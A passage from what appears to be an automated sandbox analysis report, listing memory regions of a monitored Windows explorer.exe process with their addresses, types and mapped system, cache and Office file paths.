private name = "private_0x0000000003e60000" filename = "" Region: id = 481 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 482 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 483 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 484 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 485 start_va = 0x3ee0000 end_va = 0x3ee1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 486 start_va = 0x3ef0000 end_va = 0x3f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 487 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 488 start_va = 0x3f60000 end_va = 0x3f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 489 start_va = 0x3f70000 end_va = 0x3fb4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 490 start_va = 0x3fc0000 end_va = 0x3fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 491 start_va = 0x3fd0000 end_va = 0x405dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 492 start_va = 0x4060000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 493 start_va = 0x40e0000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 494 start_va = 0x4160000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 495 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 496 start_va = 0x41f0000 end_va = 0x4238fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 497 start_va = 0x4240000 end_va = 0x4240fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 498 start_va = 0x4250000 end_va = 0x4250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 499 start_va = 0x4260000 end_va = 0x4266fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 500 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 501 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 502 start_va = 0x43f0000 end_va = 0x48e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043f0000" filename = "" Region: id = 503 start_va = 0x48f0000 end_va = 0x4aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 504 start_va = 0x4af0000 end_va = 0x4beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 505 start_va = 0x4bf0000 end_va = 0x4bf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bf0000" filename = "" Region: id = 506 start_va = 0x4c00000 end_va = 0x4c00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 507 start_va = 0x4c10000 end_va = 0x4c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 508 start_va = 0x4c20000 end_va = 0x4c20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 509 start_va = 0x4c30000 end_va = 0x4c34fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 510 start_va = 0x4c40000 end_va = 0x4c4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 511 start_va = 0x4c60000 end_va = 0x4c63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 512 start_va = 0x4c70000 end_va = 0x4d8cfff monitored = 0 entry_point = 0x4c71cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 513 start_va = 0x4df0000 end_va = 0x4e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 514 start_va = 0x4e70000 end_va = 0x566ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 515 start_va = 0x5670000 end_va = 0x5671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005670000" filename = "" Region: id = 516 start_va = 0x5680000 end_va = 0x5681fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 517 start_va = 0x5690000 end_va = 0x5690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 518 start_va = 0x56a0000 end_va = 0x56a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000056a0000" filename = "" Region: id = 519 start_va = 0x56b0000 end_va = 0x56b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000056b0000" filename = "" Region: id = 520 start_va = 0x56c0000 end_va = 0x56c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000056c0000" filename = "" Region: id = 521 start_va = 0x56d0000 end_va = 0x56d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000056d0000" filename = "" Region: id = 522 start_va = 0x56f0000 end_va = 0x57effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056f0000" filename = "" Region: id = 523 start_va = 0x57f0000 end_va = 0x586ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 524 start_va = 0x5870000 end_va = 0x7bf1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 525 start_va = 0x7c00000 end_va = 0x7c08fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 526 start_va = 0x7c40000 end_va = 0x7c48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c40000" filename = "" Region: id = 527 start_va = 0x7c50000 end_va = 0x7c50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c50000" filename = "" Region: id = 528 start_va = 0x7c60000 end_va = 0x7d5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 529 start_va = 0x7d60000 end_va = 0x7d61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d60000" filename = "" Region: id = 530 start_va = 0x7d70000 end_va = 0x7db7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d70000" filename = "" Region: id = 531 start_va = 0x7dc0000 end_va = 0x7dc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007dc0000" filename = "" Region: id = 532 start_va = 0x7e00000 end_va = 0x7e01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e00000" filename = "" Region: id = 533 start_va = 0x7e10000 end_va = 0x7e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 534 start_va = 0x7e40000 end_va = 0x7e43fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 535 start_va = 0x7e50000 end_va = 0x7e51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e50000" filename = "" Region: id = 536 start_va = 0x7e60000 end_va = 0x7e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e60000" filename = "" Region: id = 537 start_va = 0x7e70000 end_va = 0x7e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007e70000" filename = "" Region: id = 538 start_va = 0x7e80000 end_va = 0x7ec7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e80000" filename = "" Region: id = 539 start_va = 0x7f00000 end_va = 0x7f00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f00000" filename = "" Region: id = 540 start_va = 0x7f90000 end_va = 0x800ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f90000" filename = "" Region: id = 541 start_va = 0x8010000 end_va = 0x81c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 542 start_va = 0x81d0000 end_va = 0x824ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081d0000" filename = "" Region: id = 543 start_va = 0x82d0000 end_va = 0x86cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082d0000" filename = "" Region: id = 544 start_va = 0x86d0000 end_va = 0x87cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 545 start_va = 0x87d0000 end_va = 0x88cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 546 start_va = 0x88d0000 end_va = 0x894ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088d0000" filename = "" Region: id = 547 start_va = 0x8950000 end_va = 0x8a4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 548 start_va = 0x8a50000 end_va = 0x8b4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 549 start_va = 0x8bd0000 end_va = 0x8c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008bd0000" filename = "" Region: id = 550 start_va = 0x8c50000 end_va = 0x8ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c50000" filename = "" Region: id = 551 start_va = 0x8cd0000 end_va = 0x8d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cd0000" filename = "" Region: id = 552 start_va = 0x8d50000 end_va = 0x8dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d50000" filename = "" Region: id = 553 start_va = 0x8dd0000 end_va = 0x8ecffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 554 start_va = 0x8fd0000 end_va = 0x90cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 555 start_va = 0x92d0000 end_va = 0x93cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 556 start_va = 0x93d0000 end_va = 0x944ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093d0000" filename = "" Region: id = 557 start_va = 0x94d0000 end_va = 0x954ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000094d0000" filename = "" Region: id = 558 start_va = 0x9550000 end_va = 0x95cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009550000" filename = "" Region: id = 559 start_va = 0x95d0000 end_va = 0x97cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095d0000" filename = "" Region: id = 560 start_va = 0x97d0000 end_va = 0x984ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097d0000" filename = "" Region: id = 561 start_va = 0x98d0000 end_va = 0x98d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098d0000" filename = "" Region: id = 562 start_va = 0x98e0000 end_va = 0x98e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098e0000" filename = "" Region: id = 563 start_va = 0x98f0000 end_va = 0xa2effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000098f0000" filename = "" Region: id = 564 start_va = 0xa350000 end_va = 0xa3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a350000" filename = "" Region: id = 565 start_va = 0xa3d0000 end_va = 0xa44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3d0000" filename = "" Region: id = 566 start_va = 0xa450000 end_va = 0xa4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a450000" filename = "" Region: id = 567 start_va = 0xa5d0000 end_va = 0xa64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a5d0000" filename = "" Region: id = 568 start_va = 0xa650000 end_va = 0xa6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a650000" filename = "" Region: id = 569 start_va = 0xa6d0000 end_va = 0xa74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a6d0000" filename = "" Region: id = 570 start_va = 0xa750000 end_va = 0xa7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a750000" filename = "" Region: id = 571 start_va = 0xa7d0000 end_va = 0xa8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a7d0000" filename = "" Region: id = 572 start_va = 0xa8e0000 end_va = 0xa8e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a8e0000" filename = "" Region: id = 573 start_va = 0xa8f0000 end_va = 0xa8f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a8f0000" filename = "" Region: id = 574 start_va = 0xa910000 end_va = 0xa911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a910000" filename = "" Region: id = 575 start_va = 0xa920000 end_va = 0xa921fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a920000" filename = "" Region: id = 576 start_va = 0xa930000 end_va = 0xa931fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a930000" filename = "" Region: id = 577 start_va = 0xa940000 end_va = 0xa941fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a940000" filename = "" Region: id = 578 start_va = 0xa950000 end_va = 0xaad7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 579 start_va = 0xab50000 end_va = 0xabcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ab50000" filename = "" Region: id = 580 start_va = 0xac50000 end_va = 0xaccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ac50000" filename = "" Region: id = 581 start_va = 0xacd0000 end_va = 0xad4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000acd0000" filename = "" Region: id = 582 start_va = 0xad50000 end_va = 0xadcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad50000" filename = "" Region: id = 583 start_va = 0xadd0000 end_va = 0xae4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000add0000" filename = "" Region: id = 584 start_va = 0xae50000 end_va = 0xaecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae50000" filename = "" Region: id = 585 start_va = 0xaed0000 end_va = 0xafcffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 586 start_va = 0xb150000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b150000" filename = "" Region: id = 587 start_va = 0xb250000 end_va = 0xb2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b250000" filename = "" Region: id = 588 start_va = 0xb2d0000 end_va = 0xb34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2d0000" filename = "" Region: id = 589 start_va = 0xb350000 end_va = 0xb3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b350000" filename = "" Region: id = 590 start_va = 0xb5d0000 end_va = 0xb64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 591 start_va = 0xb6d0000 end_va = 0xb74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6d0000" filename = "" Region: id = 592 start_va = 0xb750000 end_va = 0xbf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b750000" filename = "" Region: id = 593 start_va = 0xbf50000 end_va = 0xc24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bf50000" filename = "" Region: id = 594 start_va = 0xc250000 end_va = 0xc741fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 595 start_va = 0xc750000 end_va = 0xc7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c750000" filename = "" Region: id = 596 start_va = 0xc7d0000 end_va = 0xf3edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 597 start_va = 0xf750000 end_va = 0xf7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f750000" filename = "" Region: id = 598 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 599 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 600 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 601 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 602 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 603 start_va = 0x7ff7aabd0000 end_va = 0x7ff7ab017fff monitored = 0 entry_point = 0x7ff7aac6e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 604 start_va = 0x7ffd330b0000 end_va = 0x7ffd33d7cfff monitored = 0 entry_point = 0x7ffd331fe880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 605 start_va = 0x7ffd35200000 end_va = 0x7ffd35208fff monitored = 0 entry_point = 0x7ffd35201b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 606 start_va = 0x7ffd35210000 end_va = 0x7ffd3525ffff monitored = 0 entry_point = 0x7ffd35241220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 607 start_va = 0x7ffd36680000 end_va = 0x7ffd3668ffff monitored = 0 entry_point = 0x7ffd36683d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 608 start_va = 0x7ffd36a80000 end_va = 0x7ffd36b2bfff monitored = 0 entry_point = 0x7ffd36a859c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 609 start_va = 0x7ffd36b30000 end_va = 0x7ffd36b7dfff monitored = 0 entry_point = 0x7ffd36b41ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 610 start_va = 0x7ffd37470000 end_va = 0x7ffd377b5fff monitored = 0 entry_point = 0x7ffd37478530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 611 start_va = 0x7ffd377c0000 end_va = 0x7ffd37a02fff monitored = 0 entry_point = 0x7ffd377c36c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 612 start_va = 0x7ffd37a10000 end_va = 0x7ffd37a97fff monitored = 0 entry_point = 0x7ffd37a24510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 613 start_va = 0x7ffd37aa0000 end_va = 0x7ffd37aeffff monitored = 0 entry_point = 0x7ffd37aabe50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 614 start_va = 0x7ffd37af0000 end_va = 0x7ffd37b06fff monitored = 0 entry_point = 0x7ffd37af2790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 615 start_va = 0x7ffd37b10000 end_va = 0x7ffd37b51fff monitored = 0 entry_point = 0x7ffd37b12230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 616 start_va = 0x7ffd37b60000 end_va = 0x7ffd37bd8fff monitored = 0 entry_point = 0x7ffd37b622d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 617 start_va = 0x7ffd37be0000 end_va = 0x7ffd37c5afff monitored = 0 entry_point = 0x7ffd37be3af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 618 start_va = 0x7ffd37c60000 end_va = 0x7ffd37db9fff monitored = 0 entry_point = 0x7ffd37c64610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 619 start_va = 0x7ffd37dc0000 end_va = 0x7ffd37fbdfff monitored = 0 entry_point = 0x7ffd37dc16c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 620 start_va = 0x7ffd37fc0000 end_va = 0x7ffd38023fff monitored = 0 entry_point = 0x7ffd37fc6b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 621 start_va = 0x7ffd38510000 end_va = 0x7ffd38650fff monitored = 0 entry_point = 0x7ffd38515f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 622 start_va = 0x7ffd38660000 end_va = 0x7ffd38780fff monitored = 0 entry_point = 0x7ffd38661cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 623 start_va = 0x7ffd3b070000 end_va = 0x7ffd3b07ffff monitored = 0 entry_point = 0x7ffd3b0778e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 624 start_va = 0x7ffd3b100000 end_va = 0x7ffd3b13dfff monitored = 0 entry_point = 0x7ffd3b109650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 625 start_va = 0x7ffd3cf40000 end_va = 0x7ffd3cfb6fff monitored = 0 entry_point = 0x7ffd3cf42af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 626 start_va = 0x7ffd3dcd0000 end_va = 0x7ffd3dcfdfff monitored = 0 entry_point = 0x7ffd3dcd6580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" 